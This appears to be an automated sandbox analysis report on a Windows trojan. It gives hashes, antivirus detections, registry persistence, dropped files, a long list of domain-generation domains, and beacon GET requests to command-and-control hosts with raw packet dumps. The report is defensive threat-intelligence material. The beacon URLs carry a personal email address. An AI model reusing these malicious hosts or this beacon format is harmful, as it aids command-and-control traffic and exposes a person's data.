Analysis Date2015-10-24 01:58:59
MD5f9430e42c6875d59510881d139bfe49e
SHA155bdc907a2f7121cb0d7719e100ef6e1cd14d445

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 5209ce7da3242bf1914f136bbe8e1fe5 sha1: 43d7d1fb83083b52cd6fd1a554216f9d41654a4e size: 301568
Section.rdata md5: 21c9b3bb20690eb951c6690304a111ca sha1: 7fbc17f25674337efa5006500c9dc1e9436e9980 size: 34304
Section.data md5: 67bf2ec64e5f302c6e38a99ba9adfaeb sha1: f5adf37405b2da9197992c23cc182539cf6cf398 size: 100352
Timestamp2014-10-30 10:09:45
PackerMicrosoft Visual C++ ?.?
PEhash1e3755ac149cfbeaae8658690dcbae693f0a3f34
IMPhash4d796dce99ee59eef7c52efb280b5e5a
AVRisingno_virus
AVMcafeeTrojan-FEMT!F9430E42C687
AVAvira (antivir)BDS/Zegost.Gen4
AVTwisterTrojan.Generic.jmfe
AVAd-AwareGen:Variant.Symmi.22722
AVAlwil (avast)Downloader-TLD [Trj]
AVEset (nod32)Win32/Rodecap.BE
AVGrisoft (avg)Win32/Cryptor
AVSymantecDownloader.Upatre!g15
AVFortinetW32/Agent.VNC!tr
AVBitDefenderGen:Variant.Symmi.22722
AVK7Trojan ( 004cb2771 )
AVMicrosoft Security EssentialsTrojanSpy:Win32/Nivdort.Z
AVMicroWorld (escan)Gen:Variant.Symmi.22722
AVMalwareBytesTrojan.Zbot.WHE
AVAuthentiumW32/Wonton.B.gen!Eldorado
AVFrisk (f-prot)no_virus
AVIkarusTrojan.FBAccountLock
AVEmsisoftGen:Variant.Symmi.22722
AVZillya!Trojan.Agent.Win32.547803
AVKasperskyTrojan.Win32.Generic
AVTrend MicroTSPY_NIVDORT.SMB
AVCAT (quickheal)Trojan.Dynamer.AC3
AVVirusBlokAda (vba32)no_virus
AVPadvishno_virus
AVBullGuardGen:Variant.Symmi.22722
AVArcabit (arcavir)Gen:Variant.Symmi.22722
AVClamAVno_virus
AVDr. WebTrojan.DownLoader11.58387
AVF-SecureGen:Variant.Symmi.22722
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Topology DLL Isolation ➝
C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.tlgaf
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\mhsegcdlcu.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe"

Process
↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rtdjmbymfjeis\ipltaqv.exe"

Network Details:

DNSeffortcountry.net
Type: A
195.22.26.252
DNSeffortcountry.net
Type: A
195.22.26.253
DNSeffortcountry.net
Type: A
195.22.26.254
DNSeffortcountry.net
Type: A
195.22.26.231
DNSincreasefamous.net
Type: A
209.99.40.223
DNSforgetcountry.net
Type: A
209.99.40.222
DNSremembercentury.net
Type: A
208.100.26.234
DNSlittleletter.net
Type: A
50.63.202.71
DNSmelbourneit.hotkeysparking.com
Type: A
8.5.1.16
DNSthosecentury.net
Type: A
DNSchairfamous.net
Type: A
DNSthosefamous.net
Type: A
DNSchairpower.net
Type: A
DNSthosepower.net
Type: A
DNSchaircountry.net
Type: A
DNSthosecountry.net
Type: A
DNSwithincentury.net
Type: A
DNSsuffercentury.net
Type: A
DNSwithinfamous.net
Type: A
DNSsufferfamous.net
Type: A
DNSwithinpower.net
Type: A
DNSsufferpower.net
Type: A
DNSwithincountry.net
Type: A
DNSsuffercountry.net
Type: A
DNSeffortcentury.net
Type: A
DNSthroughcentury.net
Type: A
DNSeffortfamous.net
Type: A
DNSthroughfamous.net
Type: A
DNSeffortpower.net
Type: A
DNSthroughpower.net
Type: A
DNSthroughcountry.net
Type: A
DNSforgetcentury.net
Type: A
DNSincreasecentury.net
Type: A
DNSforgetfamous.net
Type: A
DNSforgetpower.net
Type: A
DNSincreasepower.net
Type: A
DNSincreasecountry.net
Type: A
DNSwouldcentury.net
Type: A
DNSwouldfamous.net
Type: A
DNSrememberfamous.net
Type: A
DNSwouldpower.net
Type: A
DNSrememberpower.net
Type: A
DNSwouldcountry.net
Type: A
DNSremembercountry.net
Type: A
DNSjourneysurprise.net
Type: A
DNShusbandsurprise.net
Type: A
DNSjourneybeside.net
Type: A
DNShusbandbeside.net
Type: A
DNSjourneyletter.net
Type: A
DNShusbandletter.net
Type: A
DNSjourneydifferent.net
Type: A
DNShusbanddifferent.net
Type: A
DNSdestroysurprise.net
Type: A
DNSlittlesurprise.net
Type: A
DNSdestroybeside.net
Type: A
DNSlittlebeside.net
Type: A
DNSdestroyletter.net
Type: A
DNSdestroydifferent.net
Type: A
DNSlittledifferent.net
Type: A
DNSriddensurprise.net
Type: A
DNSbelongsurprise.net
Type: A
DNSriddenbeside.net
Type: A
DNSbelongbeside.net
Type: A
DNSriddenletter.net
Type: A
DNSbelongletter.net
Type: A
DNSriddendifferent.net
Type: A
DNSbelongdifferent.net
Type: A
DNSchairsurprise.net
Type: A
DNSthosesurprise.net
Type: A
DNSchairbeside.net
Type: A
DNSthosebeside.net
Type: A
DNSchairletter.net
Type: A
DNSthoseletter.net
Type: A
DNSchairdifferent.net
Type: A
DNSthosedifferent.net
Type: A
DNSwithinsurprise.net
Type: A
DNSsuffersurprise.net
Type: A
DNSwithinbeside.net
Type: A
DNSsufferbeside.net
Type: A
DNSwithinletter.net
Type: A
DNSsufferletter.net
Type: A
DNSwithindifferent.net
Type: A
DNSsufferdifferent.net
Type: A
DNSeffortsurprise.net
Type: A
DNSthroughsurprise.net
Type: A
DNSeffortbeside.net
Type: A
DNSthroughbeside.net
Type: A
DNSeffortletter.net
Type: A
DNSthroughletter.net
Type: A
HTTP GEThttp://effortcountry.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GEThttp://increasefamous.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GEThttp://forgetcountry.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GEThttp://remembercentury.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GEThttp://littleletter.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
HTTP GEThttp://littledifferent.net/index.php?email=kirsti@pymblearc.com.au&method=post&len
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 195.22.26.252:80
Flows TCP192.168.1.1:1032 ➝ 209.99.40.223:80
Flows TCP192.168.1.1:1033 ➝ 209.99.40.222:80
Flows TCP192.168.1.1:1034 ➝ 208.100.26.234:80
Flows TCP192.168.1.1:1035 ➝ 50.63.202.71:80
Flows TCP192.168.1.1:1036 ➝ 8.5.1.16:80

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20656666   close..Host: eff
0x00000070 (00112)   6f727463 6f756e74 72792e6e 65740d0a   ortcountry.net..
0x00000080 (00128)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20696e63   close..Host: inc
0x00000070 (00112)   72656173 6566616d 6f75732e 6e65740d   reasefamous.net.
0x00000080 (00128)   0a0d0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 20666f72   close..Host: for
0x00000070 (00112)   67657463 6f756e74 72792e6e 65740d0a   getcountry.net..
0x00000080 (00128)   0d0a0a                                ...

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 2072656d   close..Host: rem
0x00000070 (00112)   656d6265 7263656e 74757279 2e6e6574   embercentury.net
0x00000080 (00128)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 206c6974   close..Host: lit
0x00000070 (00112)   746c656c 65747465 722e6e65 740d0a0d   tleletter.net...
0x00000080 (00128)   0a0a0d0a                              ....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6b6972 73746940 70796d62   mail=kirsti@pymb
0x00000020 (00032)   6c656172 632e636f 6d2e6175 266d6574   learc.com.au&met
0x00000030 (00048)   686f643d 706f7374 266c656e 20485454   hod=post&len HTT
0x00000040 (00064)   502f312e 300d0a41 63636570 743a202a   P/1.0..Accept: *
0x00000050 (00080)   2f2a0d0a 436f6e6e 65637469 6f6e3a20   /*..Connection: 
0x00000060 (00096)   636c6f73 650d0a48 6f73743a 206c6974   close..Host: lit
0x00000070 (00112)   746c6564 69666665 72656e74 2e6e6574   tledifferent.net
0x00000080 (00128)   0d0a0d0a                              ....


Strings